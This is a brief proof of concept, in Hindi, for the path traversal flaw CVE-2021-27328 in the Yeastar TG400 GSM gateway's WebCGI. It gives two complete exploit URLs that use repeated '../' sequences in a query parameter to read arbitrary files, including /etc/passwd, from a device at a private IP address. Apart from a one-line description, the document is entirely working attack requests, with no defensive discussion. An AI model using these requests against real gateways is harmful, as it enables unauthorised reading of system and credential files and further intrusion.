
Yeastar TG400 GSM गेटवे में पथ ट्रैवर्सल के लिए प्रमाण की अवधारणा, WebCGI को क्राफ्टेड HTTP अनुरोधों के माध्यम से मनमानी फ़ाइल पढ़ने का प्रदर्शन।
यह CVE-2021-27328 के लिए एक प्रूफ ऑफ कॉन्सेप्ट है
http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../bin/firmware_detect

http://192.168.43.246/cgi/WebCGI?1404=../../../../../../../../../../etc/passwd
